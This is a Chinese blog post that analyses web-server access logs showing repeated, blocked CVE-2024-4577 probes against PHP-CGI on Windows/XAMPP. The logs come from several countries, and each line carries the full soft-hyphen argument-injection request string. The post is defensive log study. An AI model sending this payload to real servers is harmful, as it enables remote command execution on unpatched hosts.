2025年3月30日 星期日

從 Web Log 學習系統漏洞 95

來自不同的地方(烏茲別克、印度、哈薩克、俄羅斯、土庫曼、象牙海岸)作大量相同攻擊, 可能是同一人或組織

84.54.70.166 - - [28/Mar/2025:19:28:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
103.1.103.81 - - [28/Mar/2025:19:55:28 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:01:34 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
188.232.103.100 - - [28/Mar/2025:20:06:02 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
185.69.185.169 - - [28/Mar/2025:20:09:15 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
213.230.120.119 - - [28/Mar/2025:20:15:46 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
95.59.244.0 - - [28/Mar/2025:20:21:17 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
41.207.204.167 - - [28/Mar/2025:21:30:40 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"
49.47.129.57 - - [28/Mar/2025:22:41:33 +0800] "GET /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 228 "-" "Hello"

經估狗大神解疑, 這是 CVE-2024-4577, 針對 Windows系統的 XAMPP架站套件裡的 PHP-CGI漏洞作注入式指令遠端攻擊 (比較好奇的是怎麼會有 0 的 IP ?)
at
分類:

沒有留言:

張貼留言